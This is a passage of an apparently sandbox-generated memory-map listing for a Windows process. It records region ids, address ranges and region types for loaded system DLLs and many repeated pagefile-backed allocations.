mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 571 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 572 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 573 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = 
"" Region: id = 574 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 606 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 607 start_va = 0x140000 end_va = 0x1a6fff entry_point = 0x140000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 608 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 609 start_va = 0x2b0000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 610 start_va = 0x3c0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 611 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 612 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 613 start_va = 0x75830000 end_va = 0x76479fff entry_point = 0x75830000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 614 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 615 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = 
"ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 616 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 617 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 618 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 619 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 620 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 621 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 622 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 623 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 624 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 
0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 625 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 626 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 627 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 628 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 629 start_va = 0x380000 end_va = 0x380fff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 630 start_va = 0x520000 end_va = 0x620fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 631 start_va = 0x630000 end_va = 0x122ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 632 start_va = 0x1230000 end_va = 0x136ffff entry_point = 0x0 region_type = private name = "private_0x0000000001230000" filename = "" Region: id = 633 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 634 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 635 start_va = 0x1370000 end_va = 0x150ffff 
entry_point = 0x0 region_type = private name = "private_0x0000000001370000" filename = "" Region: id = 636 start_va = 0x1510000 end_va = 0x17defff entry_point = 0x1510000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 637 start_va = 0x390000 end_va = 0x390fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 638 start_va = 0x75380000 end_va = 0x7538afff entry_point = 0x75380000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 726 start_va = 0x3a0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 727 start_va = 0x17e0000 end_va = 0x1beffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000017e0000" filename = "" Region: id = 728 start_va = 0x1bf0000 end_va = 0x1ffffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bf0000" filename = "" Region: id = 729 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 730 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 731 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 732 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 733 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 734 start_va = 
0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 735 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 736 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 737 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 738 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 739 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 740 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 741 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 742 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 743 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 744 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 745 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 746 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 747 start_va 
= 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 748 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 749 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 750 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 751 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 752 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 753 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 754 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 755 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 756 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 757 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 758 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 759 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 760 
start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 761 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 762 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 763 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 764 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 765 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 766 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 767 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 768 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 769 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 770 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 771 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 772 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 
775 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 776 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 777 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 778 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 779 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 780 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 781 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 782 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 783 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 784 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 785 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 786 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 787 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id 
= 788 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 789 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 790 start_va = 0x3a0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 791 start_va = 0x17e0000 end_va = 0x1beffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000017e0000" filename = "" Region: id = 792 start_va = 0x1bf0000 end_va = 0x1ffffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bf0000" filename = "" Region: id = 793 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 794 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 795 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 796 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 797 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 798 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 799 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 800 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 
801 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 802 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 803 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 804 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 805 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 806 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 807 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 808 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 809 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 810 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 811 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 812 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 813 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id 
= 814 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 815 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 816 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 817 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 818 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 819 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 820 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 821 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 822 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 823 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 824 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 825 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 826 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: 
id = 827 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 828 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 829 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 830 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 831 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 832 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 833 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 834 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 835 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 836 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 837 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 838 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 839 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" 
Region: id = 840 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 841 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 842 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 843 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 844 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 845 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 846 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 847 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 848 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 849 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 850 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 851 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 968 start_va = 0x3a0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" 
Region: id = 969 start_va = 0x17e0000 end_va = 0x1beffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000017e0000" filename = "" Region: id = 970 start_va = 0x1bf0000 end_va = 0x1ffffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bf0000" filename = "" Region: id = 971 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 972 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 973 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 974 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 975 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 976 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 977 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 978 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 979 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 980 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 981 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" 
filename = "" Region: id = 982 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 983 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 984 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 985 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 986 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 987 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 988 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 989 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 990 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 991 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 992 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 993 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 994 start_va = 